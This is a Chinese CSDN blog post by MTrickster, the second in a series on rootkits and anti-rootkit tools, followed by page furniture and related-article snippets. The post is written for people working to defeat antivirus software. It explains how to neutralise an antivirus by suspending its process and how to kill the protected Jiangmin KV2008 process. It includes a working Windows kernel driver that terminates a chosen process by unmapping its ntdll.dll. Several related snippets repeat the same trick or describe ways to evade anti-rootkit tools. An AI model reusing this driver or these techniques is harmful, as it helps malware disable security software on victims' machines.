关于rootkit和anti-rootkit的一些思考(2)

最新推荐文章于 2022-10-26 14:24:18 发布
最新推荐文章于 2022-10-26 14:24:18 发布
阅读量604 收藏
点赞数
文章标签: hook 杀毒软件 工作 object bbs string
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MTrickster/article/details/2212735
版权

       过去近两个月,终于写了第二篇思考。 相信做rootkit等一些反安全的朋友都对杀毒软件是仇视万分。看看bbs的帖子不少是朋友问的关于如何关闭卡巴、瑞新,如何过杀毒软件的主动防御。当然最近给不用说的就是kv2008,居然icesword也搞不定。下面我就对这些说说我做的工作。

      首先说说过杀软的主动防御,相信很多朋友用的是ssdt 恢复,这种方法好不好先不说。来说说我的方法,我们不对他的ssdt hook做工作,让他死了不就行了么。呵呵,也许你会说这种方法不是更差了吗?我还说完,我说的死是一种假死,说的简单就是把他挂起来,让用户觉得他好像是活的,但他什么都做就跟死的一样。这样 别说是主动防御,就是连杀毒功能也把他搞掉了这不是更好吗?这种方法我做了很多测试,效果很好。

      接着我们说说江民2008,江民2008可以说在自身保护工作上做足了工作,我在年前拿到的时候还只是简单的hook 了keInsertApc,这个搞定他很容易。在后来就连KeInsertQueueApc、KiInsertQueueApc等都hook了。我用的第一个方法就是自己实现了这些所有的函数。第二种方法就是通过卸载模块杀死进程,原理很简单,代码也很简单就不多说了,相信大家都能看得懂。

代码:

#include "ntddk.h" NTKERNELAPI NTSTATUS PsLookupProcessByProcessId (     IN ULONG        UniqueProcessId,     IN PEPROCESS    *Process ); NTSTATUS MmUnmapViewOfSection(     IN PEPROCESS Process,     IN ULONG BaseAddress      ); void KillProcess() {      PEPROCESS   process;      PsLookupProcessByProcessId(2504,&process);      MmUnmapViewOfSection(process,0x7c920000);//0x7c920000是ntdll.dll的基址 } VOID Unload(IN PDRIVER_OBJECT DriverObject) { } NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject , IN PUNICODE_STRING RegistryPath) {      NTSTATUS      ntStatus;      KdPrint(("ok"));      DriverObject->DriverUnload=Unload;      KillProcess();      return STATUS_SUCCESS; }

MTrickster
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一款手工杀毒/Anti-rootkit工具-ixer 0.11开源版
chinghoi's blog
06-15 2985
前言:       随着信息科技的迅速发展,Internet已经成为全球最重要的信息传播工具。当人们在享受网络为我们的工作、生活带来方便和效率的同时,但它们潜在地也带来了安全问题。据统计,凡是刚开始接触过互联网的人,大部分人都或多或少的被入侵、恶意攻击过,并且安全威胁事件逐年上升。可见黑客如此猖獗,应该采取什么手段来防止黑客入侵是大家普遍关心的问题。 长期以来,最为严重的安全威胁就是恶意程序。
Anti MBR-Rootkit技术研究
01-20
摘要:本文主要对磁盘主引导记录MBR和Windows操作系统的启动过程进行了阐述,对Rootkit和MBR-Rootkit技术特点进行了总结,对MBR-Rootkit结构和实例的行为特点进行了深入研究和剖析,针对WinXP操作系统的MBR-Rootkit...
简单认识Anti-RootKit
程序人生,学海无涯
05-07 3267
简单认识Anti-RootKit 作者:single 现在RK(rootkit)和ARK(anti-rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工具是冰刃(IceSword),从冰刃开始出来到现在RK和ARK的斗争一直在继续,目前冰刃还是在流行当中,自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争 呵呵,现在很多病毒木马已经广泛的带有驱动,使用一些RK
新方法杀进程哈,百试百灵
爱杀之爪的矩阵
09-06 1042
<br />直接卸载要杀进程的ntdll.dll就可以直接杀死该进程<br /> <br />卸载可以用sdt表中的那个NtUnLoadMap**函数,或者可以使用<br />MmUnmapViewOfSection(未导出,自己搜索到)来结束<br /> <br />绿色无污染撒,用<br />MmUnmapViewOfSection这个比较好,除非被inline hook了,不然都有效(前提是获取EPROCESS,相信这个很简单吧)
MmCreateSection/MmMapViewOfSection个人注释及理解(二)
lixiangminghate的专栏
04-06 3773
MmCreateSection/MmMapViewOfSection个人注释及理解(一)中提到内存映射的第一步创建Section对象建立Segment与文件的关系,彼时尚未建立虚拟内存因此不能被访问。此文是内存映射的第二步,MmMapViewOfSection建立虚拟映射。
gl00my-内存与进程管理器2
06-04 1014
gl00my-内存与进程管理器2==========================                                   But I fear tomorrow Ill be crying,07.page fault的处理==============================对于转向对pagefault的研究,我们现在有了所有必须的信息了。转换线
deianeira.rar_Anti-rootkit_Free!
09-14
Deianeira Anti-rootkit是一款专为Windows操作系统设计的免费反Rootkit工具,它旨在帮助用户检测和清除隐藏在系统深处的恶意Rootkit程序,保护系统的安全与稳定。Rootkit是一种高级的恶意软件技术,其主要功能是隐藏...
Griffin-Hypervisor:使用Intel VT-x实现的Anti-Rootkit
03-18
Girffin系统管理程序使用Intel VT-x功能实现的Anti-Rootkit。 Griffin项目包含许多模块,其中之一就是Griffin Hypervisor。 Griffin Hypervisor是带有我们自定义安全模块的VT-x虚拟机管理程序,可在内核级别观察恶意...
基础电子中的Anti MBR-Rootkit技术研究
10-20
摘要:本文主要对磁盘主引导记录MBR和Windows操作系统的启动过程进行了阐述,对Rootkit和MBR-Rootkit技术特点进行了总结,对MBR-Rootkit结构和实例的行为特点进行了深入研究和剖析,针对WinXP操作系统的MBR-Rootkit...
AntiRootkit工具-XueTr 吾爱破解论坛专版2010.11.30更新
12-26
一个强大的手工杀毒工具,支持32位的2000、xp、2003、vista、2008和Win7操作系统。 目前实现如下功能: 1.进程、线程、进程模块、进程窗口、进程内存、定时器、热键信息查看,杀进程、杀线程、卸载模块等功能 2.内核驱动模块查看,支持内核驱动模块的内存拷贝 3.SSDT、Shadow SSDT、FSD、KBD、TCPIP、Classpnp、Atapi、Acpi、SCSI、IDT、GDT信息查看,并能检测和恢复ssdt hook和inline hook 4.CreateProcess、CreateThread、LoadImage、CmpCallback、BugCheckCallback、Shutdown、Lego等Notify Routine信息查看,并支持对这些Notify Routine的删除 5.端口信息查看,目前不支持2000系统 6.查看消息钩子 7.内核模块的iat、eat、inline hook、patches检测和恢复 8.磁盘、卷、键盘、网络层等过滤驱动检测,并支持删除 9.注册表编辑 10.进程iat、eat、inline hook、patches检测和恢复 11.文件系统查看,支持基本的文件操作 12.查看(编辑)IE插件、SPI、启动项、服务、Host文件、映像劫持、文件关联、系统防火墙规则、IME 13.ObjectType Hook检测和恢复 14.DPC定时器检测和删除 15.MBR Rootkit检测和修复 16.内核对象劫持检测 17.WorkerThread枚举
window内核监控工具源代码
09-26
一:SSDT表的hook检测和恢复 ~!~~~ 二:IDT表的hook检测和恢复 ~~~~~~(idt多处理器的恢复没处理,自己机器是单核的,没得搞,不过多核的列举可以) 三:系统加载驱动模块的检测 通过使用一个全局hash表(以DRIVEROBJECT为对象)来使用以下的方法来存储得到的结果,最终显示出来 1.常规的ZwQuerySystemInformation来列举 2通过打开驱动对象目录来列举 3搜索内核空间匹配驱动的特征来列举(这个功能里面我自己的主机一运行就死机,别的机器都没事,手动设置热键来蓝屏都不行,没dump没法分析,哎,郁闷) 4从本驱动的Modulelist开始遍历来列举驱动 四:进程的列举和进程所加载的dll检测 采用以下方法来列举进程: 1ZwQuerySystemInformation参数SystemProcessesAndThreadsInformation来枚举 2进程EPROCESS 结构的Activelist遍历来枚举 3通过解析句柄表来枚举进程 4通过Handletablelisthead枚举进程 5进程创建时都会向csrss来注册,从这个进程里面句柄表来枚举进程 6通过自身进程的HANDLETABLE来枚举进程 7通过EPROCESS的SessionProcessLinks来枚举进程 8通过EPROCESS ---VM---WorkingSetExpansionLinks获取进程 9暴力搜索内存MmSystemRangeStart以上查找PROCESS对象 进程操作: 进程的唤醒和暂停通过获取PsSuspendProcess和PsResumeProcess来操作的 进程结束通过进程空间清0和插入apc。 采用以下方法查找DLL: 1遍历VAD来查找dll 2挂靠到对应的进程查找InLoadOrderLinks来枚举dll 3暴力搜索对应进程空间查找pe特征来枚举dll DLL的操作: Dll的卸载是通过MmUnmapViewOfSection和MmmapViewOfSection(从sdt表中相应函数搜索到的)来实现的(本来想直接清0 dll空间,有时行有时不行)(只要将这个进程的ntdll卸载了,进程就结束了,一个好的杀进程的办法撒,绿色环保无污染),注入dll使用的是插入apc实现的。(注入的dll必须是realse版的。Debug版会出现***错误,全局dll注入貌似也是)插入apc效果不是很好,要有线程有告警状态才执行。 五:线程信息的检测 遍历ThreadList来枚举线程 线程的暂停和唤醒都是通过反汇编获取PsResumeThread和PsSuspendThread直接从r3传来ETHREAD来操作的,通过插入APC来结束线程 六:shadow sdt表的hook检测与恢复 没有采用pdb来解决函数名问题,直接写入xp和03的shandow表函数名(主要是自己的网不稳定,连windbg有时都连不上微软) 七:系统所有的过滤驱动的检测 查看各device下是否挂接有驱动之类的,可直接卸载 八:系统常用回调历程的检测和清除 只检查了PsSetLoadImageNotifyRoutine PsSetCreateThreadNotifyRoutine PsSetCreateProcessNotifyRoutine CmRegisterCallback这几个,至于那个什么shutdown回调不知道是啥玩意,就没搞了,有知道的顺便告诉我下撒,谢谢 九:文件系统fat和ntfs的分发函数检测 直接反汇编fat和ntfs的DriverEntry得到对应的填充分发的偏移,然后和当前已经运行的文件系统的分发相比是否被hook,并附带恢复 十:文件查看功能 自己解析ntfs和fat的结构,来实现列举文件和直接写磁盘删除。附带有普通的删除和发生IRP来删除。不过这里面有点问题,ntfs删除有时把目录给搞坏了,大家凑合着吧, Ntfs网上删除这些操作的代码不多,就是sudami大大的利用ntfs-3g来实现的,看了下,太多了,充满了结构。然后自己对照着系统删除文件时目录的变化来自己实现的。只处理了$BITMAP对应的位清除,父目录的对应文件的索引项的覆盖,删除文件对应的filerecord清0. 另外偷懒时间都没处理,呵呵,y的,一个破时间都都搞好几个字节移来移去的。 十一:常用内核模块钩子的检测和恢复 这里只检测了主要的内核模块nkrnlpa**.exe的.win32k.sys,hal.dll,比对它们的原始文件从而查找eat inline hook,iat hook ,和inline hook。Inline是从TEXT段开始一段位置开始比较的。(有点慢貌似,等待显示扫描完成就好了) 十二:应用层进程所加载dll的钩子 应用层钩子检测和内核模块钩子检测原理一样,不过为了能读写别的进程的空间,并没有使用openprocess去打开进程,而是通过KiattachProcess挂靠到当前进程,然后通过在r0直接读写进程空间的。
驱动开发:内核运用LoadImage屏蔽驱动
热门推荐
CSDN
10-26 1万+
强制返回的方法意外,屏蔽驱动加载还可以使用另一种方式实现禁用模块加载,例如当驱动被加载首先回调函数内可以接收到,当接收到以后直接调用。我们看下驱动加载器,提示的信息是拒绝访问,因为这个驱动其实是加载了的,只是入口处被填充了返回而已。加载这段驱动程序,当有DLL文件被加载后,则会强制弹出,从而实现屏蔽模块加载的作用。无法实现参数控制,而如果我们想要控制特定驱动的加载则需要自己做一些事情来实现,如下。节点,该节点里面就是被加载驱动入口,通过汇编在驱动头部写入。返回指令,即可实现屏蔽加载特定驱动文件。
绕过目前主流的现代Anti-rootkit工具
yaneng的专栏
06-18 8413
本文描述了一些方法,可以绕过目前主流的现代Anti-rootkit工具,包括但不限于:Icesword 最新版、Gmer最新版、Rootkit unhooker 最新版、DarkSpy 最新版以及AVG Anti-rootkit最新版等等  目前的anti-rootkit工具中,对于内核模块主要采用如下几种扫描方式:  1.恢复ZwQuerySystemInformation的hook,然
eBPF-AntiRootkit
SenberHu的博客
05-17 289
背景: 针对最近几年频繁出现的通过eBPF进行容器逃逸、rootkit等攻击,需要考虑如何收敛服务器ebpf相关权限,防止被黑客利用。 静态方案: 宿主机层面: 非root用户不赋予CAP_BPF及CAP_SYS_ADMIN 注:3.15 - 5.7 内核不赋予CAP_SYS_ADMIN即可 5.8及以后内核需要同时不存在CAP_BPF及CAP_SYS_ADMIN权限 非root用户禁止调用ebpf功能 /proc/sys/kernel/unprivileged_bpf_disabled 设置为1
rootkit、ark(anti-root-kit)和apt以及anit-apt和hips
lengye7的博客
10-01 1098
rookit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。   ark,全称是anti-root-kit,就是反rookit的意思。ark往往是一个工具集成包 ARK工具 (AntRootkit) ,又叫反内核工具,运行时具有最高的系统权限。 主要功能: 1、进程管理 2...
简单认识Anti-RootKit(ZT)
wxl1986622的专栏
02-29 588
from:http://www.debugman.com/read.php?tid=646 现在RK(rootkit)和ARK(anti- rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工具是冰刃(IceSword),从冰刃开始出来到现在RK和ARK的斗争一直在继续,目前冰刃还是在流行当中,自己感觉也正是冰刃的出来才带动了当前流行的RK和ARK的斗争呵呵,现在很多病毒木马已经
关于rootkitanti-rootkit的一些思考(一)
MTrickster的专栏
01-01 1095
       作了进两个月的rootkitanti-rootkit,不免有很多思考。你一直在想握着篇文章算是什么类型的呢,心得,算不上,讲技术的,更不说,就叫日志吧。如果你不幸看到这篇文章,发现几乎没有叫的是对的,请不要大惊小怪。当然我更欢迎你指出。       说道rootkitanti-rootkit,我想有一个不能不说的是hook。很多rootkitanti-rootkit产品都在
tur 进程anti rootkit
最新发布
09-01
通过及时发现和清除Rootkit,它可以防止Rootkit对系统进行潜在的攻击和破坏。它还可以提供实时的监控和警报功能,以便及早发现系统遭受Rootkit攻击的迹象。 Tur进程通常由安全软件或操作系统的开发者提供和维护。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值